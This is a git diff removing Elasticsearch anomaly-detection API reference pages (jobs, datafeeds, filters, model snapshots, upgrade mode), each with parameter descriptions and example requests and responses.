- -`groups`:: -(Optional, array of strings) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=groups] - -//Begin model_plot_config -`model_plot_config`:: -(Optional, object) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=model-plot-config] -+ -.Properties of `model_plot_config` -[%collapsible%open] -==== -`annotations_enabled`::: -(Boolean) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=model-plot-config-annotations-enabled] - -`enabled`::: -(Boolean) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=model-plot-config-enabled] - -`terms`::: -experimental[] (string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=model-plot-config-terms] -==== -//End model_plot_config - -`model_snapshot_retention_days`:: -(Optional, long) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=model-snapshot-retention-days] - -`renormalization_window_days`:: -(Optional, long) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=renormalization-window-days] - -`results_index_name`:: -(Optional, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=results-index-name] - -`results_retention_days`:: -(Optional, long) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=results-retention-days] - -[[ml-put-job-example]] -== {api-examples-title} - -[source,console] --------------------------------------------------- -PUT _ml/anomaly_detectors/total-requests -{ - "description" : "Total sum of requests", - "analysis_config" : { - "bucket_span":"10m", - "detectors": [ - { - "detector_description": "Sum of total", - "function": "sum", - "field_name": "total" - } - ] - }, - "data_description" : { - "time_field":"timestamp", - "time_format": "epoch_ms" - } -} --------------------------------------------------- - -When the job is created, you receive the following results: - -[source,console-result] ----- -{ - "job_id" : "total-requests", - "job_type" : "anomaly_detector", - "job_version" : "7.5.0", - "description" : "Total sum of requests", - "create_time" : 1562352500629, - "analysis_config" : { - "bucket_span" : "10m", - "detectors" : [ - { - "detector_description" : "Sum of total", - "function" : "sum", - "field_name" : "total", - "detector_index" : 0 - } - ], - "influencers" : [ ] - }, - "analysis_limits" : { - "model_memory_limit" : "1024mb", - "categorization_examples_limit" : 4 - }, - "data_description" : { - "time_field" : "timestamp", - "time_format" : "epoch_ms" - }, - "model_snapshot_retention_days" : 10, - "daily_model_snapshot_retention_after_days" : 1, - "results_index_name" : "shared", - "allow_lazy_open" : false -} ----- -// TESTRESPONSE[s/"job_version" : "7.5.0"/"job_version" : $body.job_version/] -// TESTRESPONSE[s/1562352500629/$body.$_path/] diff --git a/docs/reference/ml/anomaly-detection/apis/revert-snapshot.asciidoc b/docs/reference/ml/anomaly-detection/apis/revert-snapshot.asciidoc deleted file mode 100644 index e0790527728..00000000000 --- a/docs/reference/ml/anomaly-detection/apis/revert-snapshot.asciidoc +++ /dev/null @@ -1,118 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ml-revert-snapshot]] -= Revert model snapshots API -++++ -Revert model snapshots -++++ - -Reverts to a specific snapshot. - -[[ml-revert-snapshot-request]] -== {api-request-title} - -`POST _ml/anomaly_detectors//model_snapshots//_revert` - -[[ml-revert-snapshot-prereqs]] -== {api-prereq-title} - -* Before you revert to a saved snapshot, you must close the job. -* If the {es} {security-features} are enabled, you must have `manage_ml` or -`manage` cluster privileges to use this API. See -<> and {ml-docs-setup-privileges}. 
-
-
-[[ml-revert-snapshot-desc]]
-== {api-description-title}
-
-The {ml-features} react quickly to anomalous input, learning new
-behaviors in data. Highly anomalous input increases the variance in the models
-whilst the system learns whether this is a new step-change in behavior or a
-one-off event. If this anomalous input is known to be a one-off, it might be
-appropriate to reset the model state to a time before this event. For example,
-you might consider reverting to a saved snapshot after Black Friday or a
-critical system failure.
-
-NOTE: Reverting to a snapshot does not change the `data_counts` values of the
-{anomaly-job}; these values are not reverted to the earlier state.
-
-
-[[ml-revert-snapshot-path-parms]]
-== {api-path-parms-title}
-
-``::
-(Required, string)
-include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=job-id-anomaly-detection]
-
-``::
-(Required, string)
-include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=snapshot-id]
-
-
-[[ml-revert-snapshot-request-body]]
-== {api-request-body-title}
-
-`delete_intervening_results`::
-  (Optional, Boolean) If true, deletes the results in the time period between
-  the latest results and the time of the reverted snapshot. It also resets the
-  model to accept records for this time period. The default value is false.
-
-NOTE: If you choose not to delete intervening results when reverting a snapshot,
-the job will not accept input data that is older than the current time.
-If you want to resend data, then delete the intervening results.
-
-
-[[ml-revert-snapshot-example]]
-== {api-examples-title}
-
-[source,console]
---------------------------------------------------
-POST _ml/anomaly_detectors/high_sum_total_sales/model_snapshots/1575402237/_revert
-{
-  "delete_intervening_results": true
-}
---------------------------------------------------
-// TEST[skip:Kibana sample data]
-
-
-When the operation is complete, you receive the following results:
-
-[source,js]
-----
-{
-  "model" : {
-    "job_id" : "high_sum_total_sales",
-    "min_version" : "6.4.0",
-    "timestamp" : 1575402237000,
-    "description" : "State persisted due to job close at 2019-12-03T19:43:57+0000",
-    "snapshot_id" : "1575402237",
-    "snapshot_doc_count" : 1,
-    "model_size_stats" : {
-      "job_id" : "high_sum_total_sales",
-      "result_type" : "model_size_stats",
-      "model_bytes" : 1638816,
-      "model_bytes_exceeded" : 0,
-      "model_bytes_memory_limit" : 10485760,
-      "total_by_field_count" : 3,
-      "total_over_field_count" : 3320,
-      "total_partition_field_count" : 2,
-      "bucket_allocation_failures_count" : 0,
-      "memory_status" : "ok",
-      "categorized_doc_count" : 0,
-      "total_category_count" : 0,
-      "frequent_category_count" : 0,
-      "rare_category_count" : 0,
-      "dead_category_count" : 0,
-      "failed_category_count" : 0,
-      "categorization_status" : "ok",
-      "log_time" : 1575402237000,
-      "timestamp" : 1576965600000
-    },
-    "latest_record_time_stamp" : 1576971072000,
-    "latest_result_time_stamp" : 1576965600000,
-    "retain" : false
-  }
-}
-----
-
-For a description of these properties, see the
-<>.
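Because the prerequisites require the job to be closed before you revert, a typical sequence closes the job first and then issues the revert request. This is an illustrative sketch only, reusing the job and snapshot from the example above.

[source,console]
--------------------------------------------------
POST _ml/anomaly_detectors/high_sum_total_sales/_close

POST _ml/anomaly_detectors/high_sum_total_sales/model_snapshots/1575402237/_revert
{
  "delete_intervening_results": true
}
--------------------------------------------------
// TEST[skip:illustrative sketch]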
diff --git a/docs/reference/ml/anomaly-detection/apis/set-upgrade-mode.asciidoc b/docs/reference/ml/anomaly-detection/apis/set-upgrade-mode.asciidoc deleted file mode 100644 index 07f39f6c6a6..00000000000 --- a/docs/reference/ml/anomaly-detection/apis/set-upgrade-mode.asciidoc +++ /dev/null @@ -1,98 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ml-set-upgrade-mode]] -= Set upgrade mode API -++++ -Set upgrade mode -++++ - -Sets a cluster wide upgrade_mode setting that prepares {ml} indices for an -upgrade. - -[[ml-set-upgrade-mode-request]] -== {api-request-title} -////////////////////////// - -[source,console] --------------------------------------------------- -POST /_ml/set_upgrade_mode?enabled=false&timeout=10m --------------------------------------------------- -// TEARDOWN - -////////////////////////// - - -`POST _ml/set_upgrade_mode` - -[[ml-set-upgrade-mode-prereqs]] -== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `manage_ml` or -`manage` cluster privileges to use this API. See -<> and {ml-docs-setup-privileges}. - -[[ml-set-upgrade-mode-desc]] -== {api-description-title} - -When upgrading your cluster, in some circumstances you must restart your nodes and -reindex your {ml} indices. In those circumstances, there must be no {ml} jobs running. -You can close the {ml} jobs, do the upgrade, then open all the jobs again. -Alternatively, you can use this API to temporarily halt tasks associated -with the jobs and {dfeeds} and prevent new jobs from opening. You can also use this -API during upgrades that do not require you to reindex your {ml} indices, -though stopping jobs is not a requirement in that case. - -For more information, see {stack-ref}/upgrading-elastic-stack.html[Upgrading the {stack}]. - -When `enabled=true` this API temporarily halts all job and {dfeed} tasks and -prohibits new job and {dfeed} tasks from starting. - -Subsequently, you can call the API with the enabled parameter set to false, -which causes {ml} jobs and {dfeeds} to return to their desired states. - -You can see the current value for the `upgrade_mode` setting by using the -<>. - -IMPORTANT: No new {ml} jobs can be opened while the `upgrade_mode` setting is -`true`. - -[[ml-set-upgrade-mode-query-parms]] -== {api-query-parms-title} - -`enabled`:: - (Optional, Boolean) When `true`, this enables `upgrade_mode`. Defaults to - `false`. - -`timeout`:: - (Optional, time) The time to wait for the request to be completed. The default - value is 30 seconds. - -[[ml-set-upgrade-mode-example]] -== {api-examples-title} - -[source,console] --------------------------------------------------- -POST _ml/set_upgrade_mode?enabled=true&timeout=10m --------------------------------------------------- - -When the call is successful, an acknowledged response is returned. For example: - -[source,console-result] ----- -{ - "acknowledged": true -} ----- - -The acknowledged response will only be returned once all {ml} jobs and {dfeeds} have -finished writing to the {ml} internal indices. This means it is safe to reindex those -internal indices without causing failures. You must wait for the acknowledged -response before reindexing to ensure that all writes are completed. - -When the upgrade is complete, you must set `upgrade_mode` to `false` for -{ml} jobs to start running again. 
For example: - -[source,console] --------------------------------------------------- -POST _ml/set_upgrade_mode?enabled=false&timeout=10m --------------------------------------------------- diff --git a/docs/reference/ml/anomaly-detection/apis/start-datafeed.asciidoc b/docs/reference/ml/anomaly-detection/apis/start-datafeed.asciidoc deleted file mode 100644 index 5bc306b0fc7..00000000000 --- a/docs/reference/ml/anomaly-detection/apis/start-datafeed.asciidoc +++ /dev/null @@ -1,129 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ml-start-datafeed]] -= Start {dfeeds} API - -[subs="attributes"] -++++ -Start {dfeeds} -++++ - -Starts one or more {dfeeds}. - -[[ml-start-datafeed-request]] -== {api-request-title} - -`POST _ml/datafeeds//_start` - -[[ml-start-datafeed-prereqs]] -== {api-prereq-title} - -* Before you can start a {dfeed}, the {anomaly-job} must be open. Otherwise, an -error occurs. -* If {es} {security-features} are enabled, you must have `manage_ml` or `manage` -cluster privileges to use this API. See -<> and {ml-docs-setup-privileges}. - -[[ml-start-datafeed-desc]] -== {api-description-title} - -A {dfeed} must be started in order to retrieve data from {es}. -A {dfeed} can be started and stopped multiple times throughout its lifecycle. - -When you start a {dfeed}, you can specify a start time. This enables you to -include a training period, providing you have this data available in {es}. -If you want to analyze from the beginning of a dataset, you can specify any date -earlier than that beginning date. - -If you do not specify a start time and the {dfeed} is associated with a new -{anomaly-job}, the analysis starts from the earliest time for which data is -available. - -When you start a {dfeed}, you can also specify an end time. If you do so, the -job analyzes data from the start time until the end time, at which point the -analysis stops. This scenario is useful for a one-off batch analysis. If you -do not specify an end time, the {dfeed} runs continuously. - -The `start` and `end` times can be specified by using one of the -following formats: + - -- ISO 8601 format with milliseconds, for example `2017-01-22T06:00:00.000Z` -- ISO 8601 format without milliseconds, for example `2017-01-22T06:00:00+00:00` -- Milliseconds since the epoch, for example `1485061200000` - -Date-time arguments using either of the ISO 8601 formats must have a time zone -designator, where Z is accepted as an abbreviation for UTC time. - -NOTE: When a URL is expected (for example, in browsers), the `+` used in time -zone designators must be encoded as `%2B`. - -If the system restarts, any jobs that had {dfeeds} running are also restarted. - -When a stopped {dfeed} is restarted, it continues processing input data from -the next millisecond after it was stopped. If new data was indexed for that -exact millisecond between stopping and starting, it will be ignored. -If you specify a `start` value that is earlier than the timestamp of the latest -processed record, the {dfeed} continues from 1 millisecond after the timestamp -of the latest processed record. - -IMPORTANT: When {es} {security-features} are enabled, your {dfeed} remembers -which roles the last user to create or update it had at the time of -creation/update and runs the query using those same roles. If you provided -<> when -you created or updated the {dfeed}, those credentials are used instead. 
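For the one-off batch scenario described above, you can supply both a start and an end time so that the {dfeed} stops automatically when the end time is reached. The {dfeed} ID and times below are illustrative only.

[source,console]
--------------------------------------------------
POST _ml/datafeeds/datafeed-total-requests/_start
{
  "start": "2017-04-07T18:22:16Z",
  "end": "2017-04-14T00:00:00Z"
}
--------------------------------------------------
// TEST[skip:illustrative sketch]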
- -[[ml-start-datafeed-path-parms]] -== {api-path-parms-title} - -``:: -(Required, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=datafeed-id] - -[[ml-start-datafeed-request-body]] -== {api-request-body-title} - -`end`:: - (Optional, string) The time that the {dfeed} should end. This value is - exclusive. The default value is an empty string. - -`start`:: - (Optional, string) The time that the {dfeed} should begin. This value is - inclusive. The default value is an empty string. - -`timeout`:: - (Optional, time) Controls the amount of time to wait until a {dfeed} starts. - The default value is 20 seconds. - -[[ml-start-datafeed-response-body]] -== {api-response-body-title} - -`node`:: - (string) The ID of the node that the {dfeed} was started on. -If the {dfeed} is allowed to open lazily and has not yet been - assigned to a node, this value is an empty string. - -`started`:: - (Boolean) For a successful response, this value is always `true`. On failure, an - exception is returned instead. - -[[ml-start-datafeed-example]] -== {api-examples-title} - -[source,console] --------------------------------------------------- -POST _ml/datafeeds/datafeed-total-requests/_start -{ - "start": "2017-04-07T18:22:16Z" -} --------------------------------------------------- -// TEST[skip:setup:server_metrics_openjob] - -When the {dfeed} starts, you receive the following results: - -[source,console-result] ----- -{ - "started" : true, - "node" : "node-1" -} ----- diff --git a/docs/reference/ml/anomaly-detection/apis/stop-datafeed.asciidoc b/docs/reference/ml/anomaly-detection/apis/stop-datafeed.asciidoc deleted file mode 100644 index 716010c01e9..00000000000 --- a/docs/reference/ml/anomaly-detection/apis/stop-datafeed.asciidoc +++ /dev/null @@ -1,89 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ml-stop-datafeed]] -= Stop {dfeeds} API - -[subs="attributes"] -++++ -Stop {dfeeds} -++++ - -Stops one or more {dfeeds}. - -[[ml-stop-datafeed-request]] -== {api-request-title} - -`POST _ml/datafeeds//_stop` + - -`POST _ml/datafeeds/,/_stop` + - -`POST _ml/datafeeds/_all/_stop` - -[[ml-stop-datafeed-prereqs]] -== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `manage_ml` or -`manage` cluster privileges to use this API. See -<> and {ml-docs-setup-privileges}. - -[[ml-stop-datafeed-desc]] -== {api-description-title} - -A {dfeed} that is stopped ceases to retrieve data from {es}. -A {dfeed} can be started and stopped multiple times throughout its lifecycle. - -You can stop multiple {dfeeds} in a single API request by using a -comma-separated list of {dfeeds} or a wildcard expression. You can close all -{dfeeds} by using `_all` or by specifying `*` as the ``. - -[[ml-stop-datafeed-path-parms]] -== {api-path-parms-title} - -``:: -(Required, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=datafeed-id-wildcard] - -[[ml-stop-datafeed-query-parms]] -== {api-query-parms-title} - -`allow_no_match`:: -(Optional, Boolean) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=allow-no-datafeeds] - -[[ml-stop-datafeed-request-body]] -== {api-request-body-title} - -`force`:: - (Optional, Boolean) If true, the {dfeed} is stopped forcefully. - -`timeout`:: - (Optional, time) Controls the amount of time to wait until a {dfeed} stops. - The default value is 20 seconds. 
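As a sketch of the wildcard and `force` behavior described above, the following request forcefully stops every {dfeed}. Treat it as an illustration only; a forceful stop skips the normal graceful shutdown.

[source,console]
--------------------------------------------------
POST _ml/datafeeds/_all/_stop
{
  "force": true
}
--------------------------------------------------
// TEST[skip:illustrative sketch]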
- -[[ml-stop-datafeed-response-codes]] -== {api-response-codes-title} - -`404` (Missing resources):: - If `allow_no_match` is `false`, this code indicates that there are no - resources that match the request or only partial matches for the request. - -[[ml-stop-datafeed-example]] -== {api-examples-title} - -[source,console] --------------------------------------------------- -POST _ml/datafeeds/datafeed-total-requests/_stop -{ - "timeout": "30s" -} --------------------------------------------------- -// TEST[skip:setup:server_metrics_startdf] - -When the {dfeed} stops, you receive the following results: - -[source,console-result] ----- -{ - "stopped": true -} ----- diff --git a/docs/reference/ml/anomaly-detection/apis/update-datafeed.asciidoc b/docs/reference/ml/anomaly-detection/apis/update-datafeed.asciidoc deleted file mode 100644 index 6f42c2a2358..00000000000 --- a/docs/reference/ml/anomaly-detection/apis/update-datafeed.asciidoc +++ /dev/null @@ -1,152 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ml-update-datafeed]] -= Update {dfeeds} API - -[subs="attributes"] -++++ -Update {dfeeds} -++++ - -Updates certain properties of a {dfeed}. - - -[[ml-update-datafeed-request]] -== {api-request-title} - -`POST _ml/datafeeds//_update` - - -[[ml-update-datafeed-prereqs]] -== {api-prereq-title} - -* If {es} {security-features} are enabled, you must have `manage_ml`, or `manage` -cluster privileges to use this API. See -<> and {ml-docs-setup-privileges}. - - -[[ml-update-datafeed-desc]] -== {api-description-title} - -If you update a {dfeed} property, you must stop and start the {dfeed} for the -change to be applied. - -IMPORTANT: When {es} {security-features} are enabled, your {dfeed} remembers -which roles the user who updated it had at the time of update and runs the query -using those same roles. If you provide -<>, those -credentials are used instead. - -[[ml-update-datafeed-path-parms]] -== {api-path-parms-title} - -``:: -(Required, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=datafeed-id] - -[role="child_attributes"] -[[ml-update-datafeed-request-body]] -== {api-request-body-title} - -The following properties can be updated after the {dfeed} is created: - -`aggregations`:: -(Optional, object) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=aggregations] - -`chunking_config`:: -(Optional, object) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=chunking-config] - -`delayed_data_check_config`:: -(Optional, object) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=delayed-data-check-config] - -`frequency`:: -(Optional, <>) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=frequency] - -`indices`:: -(Optional, array) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=indices] - -`max_empty_searches`:: -(Optional, integer) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=max-empty-searches] -+ --- -The special value `-1` unsets this setting. --- - -`query`:: -(Optional, object) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=query] -+ --- -WARNING: If you change the query, the analyzed data is also changed. Therefore, -the required time to learn might be long and the understandability of the -results is unpredictable. If you want to make significant changes to the source -data, we would recommend you clone it and create a second job containing the -amendments. Let both run in parallel and close one when you are satisfied with -the results of the other job. 
-
---
-
-`query_delay`::
-(Optional, <>)
-include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=query-delay]
-
-`script_fields`::
-(Optional, object)
-include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=script-fields]
-
-`scroll_size`::
-(Optional, unsigned integer)
-include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=scroll-size]
-
-`indices_options`::
-(Optional, object)
-include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=indices-options]
-
-[[ml-update-datafeed-example]]
-== {api-examples-title}
-
-[source,console]
---------------------------------------------------
-POST _ml/datafeeds/datafeed-total-requests/_update
-{
-  "query": {
-    "term": {
-      "level": "error"
-    }
-  }
-}
---------------------------------------------------
-// TEST[skip:setup:server_metrics_datafeed]
-
-
-When the {dfeed} is updated, you receive the full {dfeed} configuration with
-the updated values:
-
-[source,console-result]
-----
-{
-  "datafeed_id": "datafeed-total-requests",
-  "job_id": "total-requests",
-  "query_delay": "83474ms",
-  "indices": ["server-metrics"],
-  "query": {
-    "term": {
-      "level": {
-        "value": "error",
-        "boost": 1.0
-      }
-    }
-  },
-  "scroll_size": 1000,
-  "chunking_config": {
-    "mode": "auto"
-  }
-}
-----
-// TESTRESPONSE[s/"query.boost": "1.0"/"query.boost": $body.query.boost/]
diff --git a/docs/reference/ml/anomaly-detection/apis/update-filter.asciidoc b/docs/reference/ml/anomaly-detection/apis/update-filter.asciidoc
deleted file mode 100644
index 51f9452e450..00000000000
--- a/docs/reference/ml/anomaly-detection/apis/update-filter.asciidoc
+++ /dev/null
@@ -1,65 +0,0 @@
-[role="xpack"]
-[testenv="platinum"]
-[[ml-update-filter]]
-= Update filters API
-++++
-Update filters
-++++
-
-Updates the description of a filter, adds items, or removes items.
-
-[[ml-update-filter-request]]
-== {api-request-title}
-
-`POST _ml/filters//_update`
-
-[[ml-update-filter-prereqs]]
-== {api-prereq-title}
-
-* If the {es} {security-features} are enabled, you must have `manage_ml` or
-`manage` cluster privileges to use this API. See
-<> and {ml-docs-setup-privileges}.
-
-[[ml-update-filter-path-parms]]
-== {api-path-parms-title}
-
-``::
-(Required, string)
-include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=filter-id]
-
-[[ml-update-filter-request-body]]
-== {api-request-body-title}
-
-`add_items`::
-  (Optional, array of strings) The items to add to the filter.
-
-`description`::
-  (Optional, string) A description for the filter.
-
-`remove_items`::
-  (Optional, array of strings) The items to remove from the filter.
- -[[ml-update-filter-example]] -== {api-examples-title} - -[source,console] --------------------------------------------------- -POST _ml/filters/safe_domains/_update -{ - "description": "Updated list of domains", - "add_items": ["*.myorg.com"], - "remove_items": ["wikipedia.org"] -} --------------------------------------------------- -// TEST[skip:setup:ml_filter_safe_domains] - -The API returns the following results: - -[source,console-result] ----- -{ - "filter_id": "safe_domains", - "description": "Updated list of domains", - "items": ["*.google.com", "*.myorg.com"] -} ----- diff --git a/docs/reference/ml/anomaly-detection/apis/update-job.asciidoc b/docs/reference/ml/anomaly-detection/apis/update-job.asciidoc deleted file mode 100644 index 74d73cae8c0..00000000000 --- a/docs/reference/ml/anomaly-detection/apis/update-job.asciidoc +++ /dev/null @@ -1,287 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ml-update-job]] -= Update {anomaly-jobs} API -++++ -Update jobs -++++ - -Updates certain properties of an {anomaly-job}. - -[[ml-update-job-request]] -== {api-request-title} - -`POST _ml/anomaly_detectors//_update` - -[[ml-update-job-prereqs]] -== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `manage_ml` or -`manage` cluster privileges to use this API. See -<> and {ml-docs-setup-privileges}. - - -[[ml-update-job-path-parms]] -== {api-path-parms-title} - -``:: -(Required, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=job-id-anomaly-detection] - -[role="child_attributes"] -[[ml-update-job-request-body]] -== {api-request-body-title} - -The following properties can be updated after the job is created: - -`allow_lazy_open`:: -(Boolean) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=allow-lazy-open] -+ --- -NOTE: If the job is open when you make the update, you must stop the {dfeed}, -close the job, then reopen the job and restart the {dfeed} for the changes to take effect. - --- -//Begin analysis_limits -[[update-analysislimits]]`analysis_limits`:: -(Optional, object) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=analysis-limits] -+ -.Properties of `analysis_limits` -[%collapsible%open] -==== -`model_memory_limit`::: -(long or string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=model-memory-limit] -+ --- -NOTE: You can update the `analysis_limits` only while the job is closed. The -`model_memory_limit` property value cannot be decreased below the current usage. - -TIP: If the `memory_status` property in the -<> has a value of -`hard_limit`, this means that it was unable to process some data. You might want -to re-run the job with an increased `model_memory_limit`. - --- -==== -//End analysis_limits - -`background_persist_interval`:: -(<>) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=background-persist-interval] -+ --- -NOTE: If the job is open when you make the update, you must stop the {dfeed}, -close the job, then reopen the job and restart the {dfeed} for the changes to take effect. - --- - -[[update-customsettings]]`custom_settings`:: -(object) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=custom-settings] - -`daily_model_snapshot_retention_after_days`:: -(long) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=daily-model-snapshot-retention-after-days] - -`description`:: -(string) A description of the job. - -//Begin detectors -`detectors`:: -(array) An array of detector update objects. 
-+ -.Properties of `detectors` -[%collapsible%open] -==== - -//Begin detectors.custom_rules -`custom_rules`::: -(array) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=custom-rules] -+ -.Properties of `custom_rules` -[%collapsible%open] -===== - -`actions`::: -(array) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=custom-rules-actions] - -// Begin detectors.custom_rules.conditions -`conditions`::: -(array) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=custom-rules-conditions] -+ -.Properties of `conditions` -[%collapsible%open] -====== - -`applies_to`:::: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=custom-rules-conditions-applies-to] - -`operator`:::: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=custom-rules-conditions-operator] - -`value`:::: -(double) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=custom-rules-conditions-value] -====== -//End detectors.custom_rules.conditions - -//Begin detectors.custom_rules.scope -`scope`::: -(object) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=custom-rules-scope] -+ -.Properties of `scope` -[%collapsible%open] -====== -`filter_id`:::: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=custom-rules-scope-filter-id] - -`filter_type`:::: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=custom-rules-scope-filter-type] -====== -//End detectors.custom_rules.scope -===== -//End detectors.custom_rules - -`description`::: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=detector-description] - -`detector_index`::: -(integer) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=detector-index] -+ --- -If you want to update a specific detector, you must use this identifier. You -cannot, however, change the `detector_index` value for a detector. --- -==== -//End detectors - -`groups`:: -(array of strings) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=groups] - -//Begin model_plot_config -`model_plot_config`:: -(object) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=model-plot-config] -+ -.Properties of `model_plot_config` -[%collapsible%open] -==== -`annotations_enabled`::: -(Boolean) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=model-plot-config-annotations-enabled] - -`enabled`::: -(Boolean) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=model-plot-config-enabled] - -`terms`::: -experimental[] (string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=model-plot-config-terms] -==== -//End model_plot_config - -`model_snapshot_retention_days`:: -(long) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=model-snapshot-retention-days] - -//Begin per_partition_categorization -`per_partition_categorization`::: -(object) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=per-partition-categorization] -+ -.Properties of `per_partition_categorization` -[%collapsible%open] -==== -`enabled`::: -(Boolean) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=per-partition-categorization-enabled] - -`stop_on_warn`::: -(Boolean) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=per-partition-categorization-stop-on-warn] -==== -//End per_partition_categorization - -`renormalization_window_days`:: -(long) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=renormalization-window-days] -+ --- -NOTE: If the job is open when you make the update, you must stop the {dfeed}, -close the job, then reopen the job and restart the {dfeed} for the changes to take effect. 
- --- -`results_retention_days`:: -(long) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=results-retention-days] - - -[[ml-update-job-example]] -== {api-examples-title} - -[source,console] --------------------------------------------------- -POST _ml/anomaly_detectors/low_request_rate/_update -{ - "description":"An updated job", - "detectors": { - "detector_index": 0, - "description": "An updated detector description" - }, - "groups": ["kibana_sample_data","kibana_sample_web_logs"], - "model_plot_config": { - "enabled": true - }, - "renormalization_window_days": 30, - "background_persist_interval": "2h", - "model_snapshot_retention_days": 7, - "results_retention_days": 60 -} --------------------------------------------------- -// TEST[skip:setup:Kibana sample data] - -When the {anomaly-job} is updated, you receive a summary of the job -configuration information, including the updated property values. For example: - -[source,js] ----- -{ - "job_id" : "low_request_rate", - "job_type" : "anomaly_detector", - "job_version" : "7.5.1", - "groups" : [ - "kibana_sample_data", - "kibana_sample_web_logs" - ], - "description" : "An updated job", - "create_time" : 1578101716125, - "finished_time" : 1578101721816, - "analysis_config" : { - "bucket_span" : "1h", - "summary_count_field_name" : "doc_count", - "detectors" : [ - { - "detector_description" : "An updated detector description", - "function" : "low_count", - "detector_index" : 0 - } - ], - "influencers" : [ ] - }, - ... -} ----- diff --git a/docs/reference/ml/anomaly-detection/apis/update-snapshot.asciidoc b/docs/reference/ml/anomaly-detection/apis/update-snapshot.asciidoc deleted file mode 100644 index b637311e718..00000000000 --- a/docs/reference/ml/anomaly-detection/apis/update-snapshot.asciidoc +++ /dev/null @@ -1,74 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ml-update-snapshot]] -= Update model snapshots API -++++ -Update model snapshots -++++ - -Updates certain properties of a snapshot. - -[[ml-update-snapshot-request]] -== {api-request-title} - -`POST _ml/anomaly_detectors//model_snapshots//_update` - -[[ml-update-snapshot-prereqs]] -== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `manage_ml` or -`manage` cluster privileges to use this API. See -<> and {ml-docs-setup-privileges}. - - -[[ml-update-snapshot-path-parms]] -== {api-path-parms-title} - -``:: -(Required, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=job-id-anomaly-detection] - -``:: -(Required, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=snapshot-id] - -[[ml-update-snapshot-request-body]] -== {api-request-body-title} - -The following properties can be updated after the model snapshot is created: - -`description`:: -(Optional, string) A description of the model snapshot. - -`retain`:: -(Optional, Boolean) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=retain] - -[[ml-update-snapshot-example]] -== {api-examples-title} - -[source,console] --------------------------------------------------- -POST -_ml/anomaly_detectors/it_ops_new_logs/model_snapshots/1491852978/_update -{ - "description": "Snapshot 1", - "retain": true -} --------------------------------------------------- -// TEST[skip:todo] - -When the snapshot is updated, you receive the following results: -[source,js] ----- -{ - "acknowledged": true, - "model": { - "job_id": "it_ops_new_logs", - "timestamp": 1491852978000, - "description": "Snapshot 1", -... 
